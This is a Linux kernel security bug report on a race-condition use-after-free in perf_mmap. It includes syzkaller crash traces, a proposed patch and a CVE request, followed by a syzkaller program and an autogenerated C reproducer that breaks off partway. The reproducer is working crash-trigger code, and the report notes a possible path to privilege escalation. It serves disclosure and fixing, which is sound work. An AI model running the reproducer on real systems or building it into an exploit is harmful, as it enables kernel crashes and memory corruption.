__refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) \ ({ \ int ok = 1; \ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \ if (_setjmp(segv_env) == 0) { \ __VA_ARGS__; \ } else \ ok = 0; \ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \ ok; \ }) #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // pkey_mprotect arguments: [ // addr: VMA[0x2000] // len: len = 0x2000 (8 bytes) // prot: mmap_prot = 0x5 (8 bytes) // key: pkey (resource) // ] syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul, /*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); 